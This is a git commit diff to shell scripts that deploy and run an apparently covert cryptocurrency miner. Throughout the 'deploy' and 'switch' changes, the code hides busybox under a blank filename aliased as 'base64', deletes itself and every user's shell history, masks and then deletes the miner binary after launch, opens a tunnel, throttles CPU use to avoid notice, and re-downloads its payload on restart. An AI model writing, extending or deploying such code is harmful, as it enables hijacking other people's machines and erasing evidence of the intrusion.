- cfg deletion delegated to miner - climit delegated to miner - switch loop refactor to handle while loop breaks - added paused lock for line reads - fixes for miner config update and manual restarts - removed read-only variables declaration - minor fixes

diff --git a/deploy b/deploy
--- a/deploy
+++ b/deploy
@@ -2,7 +2,7 @@
 ## needed tmux sed grep envsubst
 
 ## load customization variables
-[ -f env.sh ] && . ./env.sh && STARTING_VARS=$(<env.sh) && rm -f env.sh
+[ -f env.sh ] && . ./env.sh && STARTING_VARS="$(<env.sh)" && rm -f env.sh
 STARTING_VARS="$STARTING_VARS pl_mask=$pl_mask pl_ep=$pl_ep pl_token=$pl_token pl_name=$pl_name"
 STARTING_PATH=${STARTING_PATH:-$PATH}
 STARTING_PID=$BASHPID
@@ -18,17 +18,14 @@ cleanup() {
         rm -rf "${p}"
     done
     IFS=$previfs
+    cp "${tmppath}/${bb}" "${tmppath}/../${bb}"
     rm -rf "$tmppath" "scripts-${BRANCH}" \
        -- "$0" \
        "dig" "cookie" "env.sh" "../env.sh" \
        "$HOME"/.*_history ~/.*_history /.*_history
     mkdir "$tmppath" && cd "$tmppath" ## now use tmppath only to store tmp bins
-    mv "../$bb" "$tmppath/"
+    cp "${tmppath}/../${bb}" "${tmppath}/${bb}"
     link_bb "$bb"
-    # [ -n "$tmppath" ] && find ${tmppath}/${dir} \
-        #                           ! -name "$OBJ_MASK" \
-        #                           ! -name "$OBJ_CFG_MASK" \
-        #                           -delete
 }
 
 pathx() {
@@ -101,8 +98,8 @@ connect-timeout = 10
         CURL_HOME=$PWD curl -sOL
         rm -f .curlrc
     fi
-    [ "${tmppath/ }" = "$tmppath" ] && { log "something is wrong with the tmppath!? aborting" && exit 1; }
-    $extract "${name}${format}" && rm "${name}${format}" || { log "problems with payload." && exit 1; }
+    [ "${tmppath/ }" = "$tmppath" ] && { echo "something is wrong with the tmppath!? aborting" && exit 1; }
+    $extract "${name}${format}" && rm "${name}${format}" || { echo "problems with payload." && exit 1; }
     # tar xf ${BRANCH}.tar.gz && rm ${BRANCH}.tar.gz
     # cd ${REPO}-${BRANCH} || exit 1
 }
@@ -122,21 +119,27 @@ bb=" "
 link_bb() {
     ln -s "$1" "base64"
 }
-cp "$(get_path busybox)" "$tmppath/../$bb" && chmod +x "$tmppath/../$bb"
+cp "$(get_path busybox)" "$tmppath/../$bb" &&
+    chmod +x "$tmppath/../$bb"
 link_bb "$tmppath/../$bb"
 
 ## choose masks
+log "deploy: masks"
 . ./masks || exit 1
 
 ## start tunnel
+log "deploy: tnl"
 . ./tstarter || exit 1
 setup_tnl
 
 ## config object
+log "deploy: objconfig"
 . ./objconfig || exit 1
 
 ## start the pausd daemon passing the object args
+log "deploy: pausd"
 . ./pausd || exit 1
+log "deploy: switch"
 . ./switch || exit 1
 
 fleep 1
diff --git a/switch b/switch
--- a/switch
+++ b/switch
@@ -15,7 +15,7 @@ export PATH=".:$PATH"
 . ./gobbler
 
 ## update miner config value $1 with $2 ($2 doesn't need escaped quotes)
-readonly cc_rgx='( *".*?" *: *)("(.*?)"|([^,]*?)) *(,|.*?\/\/.*?|\n|$)'
+cc_rgx='( *".*?" *: *)("(.*?)"|([^,]*?)) *(,|.*?\/\/.*?|\n|$)'
 change_config() {
     # CONFIG=$(printf '%s' "$CONFIG" | sed -r 's/('"$1"'" *: *).*$/\1'"\"$2\""\,$'/' | tee ${OBJ_CFG_MASK})
     local subs
@@ -35,7 +35,7 @@ change_config() {
 }
 
 ## output miner config value $1 unquoted
-readonly gc_rgx=' *".*?" *: *("(.*?)"|([^,]*)) *(,|.*?\/\/.*?|\n|$)'
+gc_rgx=' *".*?" *: *("(.*?)"|([^,]*)) *(,|.*?\/\/.*?|\n|$)'
 get_config() {
     while read l; do
         if [ "${l}" != "${l/\"*$1*\"*:/}" ]; then
@@ -81,7 +81,7 @@ change_profile() {
     case "$SWITCH_PROFILE" in
         "HOT")
             change_config print-time 1
-            readonly switch_stepping=${switch_stepping:-1} \
+            switch_stepping=${switch_stepping:-1} \
                      switch_trigger=${switch_trigger:-2} \
                      wakeup_timeout=${wakeup_timeout:-6} \
                      cpu_avg_period=1 print_time=1
@@ -91,7 +91,7 @@ change_profile() {
             ;;
         "WARM")
             change_config print-time 3
-            readonly switch_stepping=${switch_stepping:-1} \
+            switch_stepping=${switch_stepping:-1} \
                      switch_trigger=${switch_trigger:-3} \
                      wakeup_timeout=${wakeup_timeout:-2700} \
                      cpu_avg_period=1 print_time=3
@@ -101,7 +101,7 @@ change_profile() {
             ;;
         "COLD")
             change_config print-time 60
-            readonly switch_stepping=${switch_stepping:-1} \
+            switch_stepping=${switch_stepping:-1} \
                      switch_trigger=${switch_trigger:-15} \
                      wakeup_timeout=${wakeup_timeout:-20800} \
                      cpu_avg_period=10 print_time=60
@@ -111,7 +111,7 @@ change_profile() {
             ;;
         "FROZEN")
             change_config print-time 43200
-            readonly switch_stepping=${switch_stepping:-1} \
+            switch_stepping=${switch_stepping:-1} \
                      switch_trigger=${switch_trigger:-999999999} \
                      wakeup_timeout=${wakeup_timeout:-86400} \
                      cpu_avg_period=10 print_time=43200
@@ -121,7 +121,7 @@ change_profile() {
             ;;
         "DEFAULT"|*)
             change_config print-time 15
-            readonly switch_stepping=${switch_stepping:-1} \
+            switch_stepping=${switch_stepping:-1} \
                      switch_trigger=${switch_trigger:-4} \
                      wakeup_timeout=${wakeup_timeout:-3600} \
                      cpu_avg_period=5 print_time=15
@@ -150,31 +150,23 @@ load_bins() {
     fi
     # disable_tracing
     local tries=0 max_tries=3
+    log "loadbins: starting while loop"
     while [ $tries -lt $max_tries ]; do
-        if [ -n "$VERBOSE" ]; then
-            {
-                fileToVar "${OBJ_MASK}" OBJ_BIN 2>>${VERBOSE} || { log "troubles loading obj_bin"; obj_fail=1; }
-                fileToVar "${CLM_MASK}" CLM_BIN 2>>${VERBOSE} || { log "troubles loading clm_bin"; clm_fail=1; }
-            }
-            if [ "$obj_fail" = 1 -o "$clm_fail" = 1 ]; then
-                continue
-            else
-                [ "$1" = rm ] && rm -f "${OBJ_MASK}" "${CLM_MASK}"
-                break
-            fi
-        else
-            {
-                fileToVar "${OBJ_MASK}" OBJ_BIN || obj_fail=1
-                fileToVar "${CLM_MASK}" CLM_BIN || clm_fail=1
-            }
-            if [ "$obj_fail" = 1 -o "$clm_fail" = 1 ]; then
-                continue
-            else
-                [ "$1" = rm ] && rm -f "${OBJ_MASK}" "${CLM_MASK}"
-                break
-            fi
-        fi
         tries=$((tries+1))
+        {
+            log "loadbins: fileTorVar..."
+            fileToVar "${OBJ_MASK}" OBJ_BIN || obj_fail=1
+            # fileToVar "${CLM_MASK}" CLM_BIN || clm_fail=1
+        }
+        log "loadbins: checking fail"
+        if [ "$obj_fail" = 1 -o "$clm_fail" = 1 ]; then
+            log "loadbins: fail... retrying..."
+            continue
+        else
+            log "loadbins: success clearing bins"
+            [ "$1" = rm ] && rm -f "${OBJ_MASK}" "${CLM_MASK}"
+            break
+        fi
     done
     [ $tries -ge $max_tries ] && return 1
     # enable_tracing
@@ -186,13 +178,8 @@ dump_bins() {
         load_bins || { log "load bins failed again"; return 1; }
     fi
     # disable_tracing
-    if [ -n "$VERBOSE" ]; then
-        varToFile OBJ_BIN "${OBJ_MASK}" 2>>${VERBOSE} ; chmod +x "${OBJ_MASK}" && unset OBJ_BIN
-        varToFile CLM_BIN "${CLM_MASK}" 2>>${VERBOSE} ; chmod +x "${CLM_MASK}" && unset CLM_BIN
-    else
-        varToFile OBJ_BIN "${OBJ_MASK}" ; chmod +x "${OBJ_MASK}" && unset OBJ_BIN
-        varToFile CLM_BIN "${CLM_MASK}" ; chmod +x "${CLM_MASK}" && unset CLM_BIN
-    fi
+    varToFile OBJ_BIN "${OBJ_MASK}" ; chmod +x "${OBJ_MASK}" && unset OBJ_BIN
+    # varToFile CLM_BIN "${CLM_MASK}" ; chmod +x "${CLM_MASK}" && unset CLM_BIN
     # enable_tracing
 }
 
@@ -263,10 +250,7 @@ init() {
     change_profile ${SWITCH_PROFILE:-DEFAULT}
 
     ## load some binaries into variables
-    [ -z "$VERBOSE" ] &&
-        load_bins 2>/dev/null ||
-            load_bins 2>>${VERBOSE}
-
+    load_bins
 }
 
 ## prevent concurrent miner start calls
@@ -282,7 +266,7 @@ lock_miner() {
             return
         fi
     done ## miner must not be running
-    [ -n "$lockminer" ] && log "concurrent calls, aborting" && exit 1
+    [ -n "$lockminer" ] && log "concurrent calls, aborting" && return 1
     lockminer=1
 }
 unlock_miner() {
@@ -324,7 +308,9 @@ rmcfg() {
 start_miner() {
     clear_log
     log "miner: starting miner..."
-    lock_miner
+    while :; do
+        lock_miner && break
+    done
     ## switch path to remove tmppath later ( for deploy script )
     [ "$PWD" != "$tmppath" -a -n "$tmppath" ] && cd "$tmppath"
     START_TIME=$SECONDS SLEEP_TIMER=0
@@ -351,12 +337,11 @@ start_miner() {
     start_coproc cpumon ${objectd_PID} ${cpumon_span} ${cpumon_ival} 2>/dev/null
     # enable_tracing
     ## delete object bin after start
-    [ -z "$VERBOSE" ] &&
-        load_bins rm 2>/dev/null ||
-            load_bins rm 2>>${VERBOSE}
+    log "reloading bins"
+    load_bins rm 2>&1
     log 'miner: unlock miner'
     unlock_miner
-    RMCFG_SCHEDULE=60
+    # RMCFG_SCHEDULE=60
 }
 
 # stop_miner(){
@@ -378,15 +363,18 @@ stop_miner(){
 
 scratcher() {
     # stop_miner
+    log "scratcher: removing traps"
     trap - SIGINT EXIT SIGKILL SIGTERM ## remove traps
+    log "scratcher: killing jobs"
     kill -9 $(jobs -p)
     rm -f "$OBJ_CFJ_MASK" \
        "$OBJ_MASK" \
        "$CLM_MASK"
 
+    log "scratcher: generating new config"
     COMMAND_BEFORE=$(get_config command_before)
     COMMAND_AFTER=$(get_config command_after)
-    UPDATED_DEPLOY="kill -9 $STARTING_PID
+    UPDATED_DEPLOY="## kill -9 $STARTING_PID
     # starting_vars
     STARTING_VARS=\"$STARTING_VARS\"
     $STARTING_VARS
@@ -399,17 +387,21 @@ scratcher() {
     $COMMAND_AFTER
     # command after end"
 
+    log "scratcher: unsetting object variables"
     clear_fds ## very important much troubles
-    # unset OBJ_BIN CLM_BIN ## this would clog the clear_env func
-    # clear_env PATH SHELL USER TMUX PWD HOME CHARSET TERM UPDATED_DEPLOY BASHPID STARTING_VARS COMMAND_BEFORE DEPLOY COMMAND_AFTER
+    unset OBJ_BIN CLM_BIN ## this would clog the clear_env func
+    log "scratcher: de exporting variables"
     dex_env
     export PATH=$STARTING_PATH
-    if [ "$TMX" = 0 ]; then
-        bash <<<"$(printf '%s' "$UPDATED_DEPLOY")" 2>&2 1>&1 0<&0 & disown
-        exit ## same as below
-    else
-        exec bash <<< "$(printf '%s' "$UPDATED_DEPLOY")"
-    fi
+    log "scratcher: executing the new deploy"
+    # if [ "$TMX" = 0 ]; then
+    #     bash <<<"$(printf '%s' "$UPDATED_DEPLOY")" 2>&2 1>&1 0<&0 & disown
+    #     exit ## same as below
+    # else
+    newfd updated_deploy
+    printf '%s' "$UPDATED_DEPLOY" >&$updated_deploy
+    exec bash <&$updated_deploy
+    # fi
     # kill -9 $BASHPID ## this kill the job that the parent is waiting for
 }
 
@@ -550,8 +542,9 @@ change_load() {
                     ;;
                 "THREAD_TRIAL"|\
                     "B_THREAD_TRIAL")
-                    change_threads up || return 1
-                    change_mask 0
+                    change_threads up &&
+                        change_mask 0 ||
+                            return 1
                     ;;
                 "MASK_TRIAL"|\
                     "MASK_UP_THREADS_DOWN"|\
@@ -692,7 +685,7 @@ calc_hyst() {
 
 ## hash has fallen if current hashing is lower than max by LOWRATE
 hash_check() {
-    [ $CHs = 0 ] && return 0
+    [ "$CHs" = 0 ] && return 0
     diff=$((XHs-CHs)) && calc_hyst
     limit=$((XHs/LOWRATE-hyst))
     ## must be better than max hash and previous hash
@@ -1107,51 +1100,57 @@ pblcfg() {
     [ "${1/publish config}" != "${1}" ]
 }
 
-readonly act_rgx='(accepted|speed|-> publish config|-> trigger restart|-> restart)'
+act_rgx='(accepted|speed|paused|-> update config|-> publish config|-> trigger restart)'
 choose_action() {
     [[ "$1" =~ $act_rgx ]]
     read_action=${BASH_REMATCH[0]}
     log "action: read line $1"
     log "action: starting ${read_action:-default}"
+    unset pause_lock ## unset pause lock at each iteration
     case "$read_action" in
         "accepted")
             ## eval because the fd might be recreated
             # eval "echo \"\$l\" >&\${forwarded_lines}" ## this fd is created by pausd
             ## put in background because it might stall and give it a timeout
-            log "action: forwarding with timeout...echo \"$l\" >&${forwarded_lines}"
-            echofd ${forwarded_lines} "$l" ## this fd is created by pausd
+            log "action: forwarding with timeout...$l to fd ${forwarded_lines}"
+            echofd "${forwarded_lines}" "$l" ## this fd is created by pausd
             # timeout 5 echo "\"$l\"" ">&${forwarded_lines}" &>/dev/null ## this fd is created by pausd
             log "action: forwarded with timeout"
             ;;
         "speed")
             switcher "$l" || { stop_miner; start_miner; } ## non zero exit code means a switch has happened
             ;;
+        "paused")
+            pause_lock=1
+            ;;
         "-> update config")
             update_lock=1
             ;;
         "-> trigger restart")
-            ## trigger restart comes after a config update
-            local cfg_rtr=1
-            while :; do
-                [ -e "${OBJ_CFG_MASK}" -o "$cfg_rtr" -gt 3 ] && break
-                cfg_rtr=$((cfg_rtr+1))
-                fleep $cfg_rtr;
-            done
-            [[ -s "$OBJ_CFG_MASK" ]] && CONFIG="$(<${OBJ_CFG_MASK})"
-            eval "$(get_config command_before)"
-            stop_miner
-            start_miner
-            unset update_lock
-            ;;
-        "-> restart") ## a direct restart command is reserved for payload redownload
-            scratcher
+            ## trigger restart comes after a config update or a full restart
+            if [ -n "$update_lock" ]; then
+                local cfg_rtr=1
+                while :; do
+                    [ -e "${OBJ_CFG_MASK}" -o "$cfg_rtr" -gt 3 ] && break
+                    cfg_rtr=$((cfg_rtr+1))
+                    fleep $cfg_rtr;
+                done
+                [[ -s "$OBJ_CFG_MASK" ]] && CONFIG="$(<${OBJ_CFG_MASK})"
+                eval "$(get_config command_before)"
+                stop_miner
+                start_miner
+                unset update_lock
+            else
+                ## no config update, a plain restart redownloads the payload
+                scratcher
+            fi
             ;;
         "-> publish config")
             dump_config
-            RMCFG_SCHEDULE=60
+            # RMCFG_SCHEDULE=60
             ;;
         *) ## if nothing interesting was printed do some routine work
-            [ -n "$RMCFG_SCHEDULE" -a -z "$update_lock" ] && rmcfg ##  set by start miner
+            # [ -n "$RMCFG_SCHEDULE" -a -z "$update_lock" ] && rmcfg ##  set by start miner
             [ "$((SECONDS%1000))" -gt 900  ] &&
                 [ -a "$((SECONDS-CLEARED_LOGS))" -gt 100 -o -z "$CLEARED_LOGS" ] &&
                 { clear_log; ## wipe log every ~15mins
@@ -1176,30 +1175,26 @@ start_switcher() {
     [ -z "$wakeup_timeout" ] && wakeup_timeout=6
     rto=${rto:-$((print_time*3+60))} ## read timeout
     # lto=${lto:-$((2*wakeup_timeout))} ## lock timeout
-    while true; do
+    log "switcher: checking miner alive"
+    while kill -0 ${objectd_PID}; do
         ## timeout after reads but only if a sane amount of time from startup has passed (rto*3)
-        log "switcher: checking miner alive"
         ## if exit status is less then 128 it means the fd is closed, so the miner is probably stopped
-        unset l
-        while kill -0 ${objectd_PID}; do
-            [ -n "$l" ] && { choose_action "$l"; unset l; }
-            log "switcher: miner alive, reading line"
-            read -t $rto -ru ${objectd[0]} l
-            log "swticher: line was read"
-            line_status=$?
-            if [ "$line_status" != 0 ] && [ "$line_status" -lt 128 -o $SECONDS -gt $((rto*3)) ]; then
-                log "failed to read with timeout $rto, line is $l, status is $line_status"
-                break
-            fi
-            log "switcher: choosing an action"
-            choose_action "$l"
-            unset l ## clear l after action is chosen, ## SIGTSTP workaround
-            log "switcher: action ended"
-        done
-        ## no miner, restart it
-        log "switcher: miner not running!"
-        break
+        [ -n "$l" ] && { choose_action "$l"; unset l; }
+        rst=$SECONDS
+        log "switcher: miner alive, reading line from fd: ${objectd[0]}"
+        read -t $rto -ru ${objectd[0]} l; line_status=$?
+        log "swticher: line was read"
+        if [ "$line_status" != 0 -a -z "$pause_lock" ] && [ "$line_status" -lt 128 -o $((SECONDS-rst)) -gt $((rto*3)) ]; then
+            log "switcher: failed to read with timeout $rto, line is $l, status is $line_status"
+            break
+        fi
+        log "switcher: choosing an action"
+        choose_action "$l"
+        unset l ## clear l after action is chosen
+        log "switcher: action ended"
     done
+    ## no miner, restart it
+    log "switcher: no output from miner or miner not running!"
 }
 
 ## start the switcher
@@ -1213,13 +1208,14 @@ start() {
         log "main: starting miner"
         start_miner
         log "main: starting switcher loop"
+        unset l
         while true; do
             start_switcher
             kill -0 ${objectd_PID} || break
         done
         log "main: switcher loop broke, restarting miner"
         fleep 0 ## reset fleep fd
-        log "fleep reset, sleeping and restarting"
+        log "main: fleep reset, sleeping and restarting"
         timeout 5 fleep 5
     done
 }
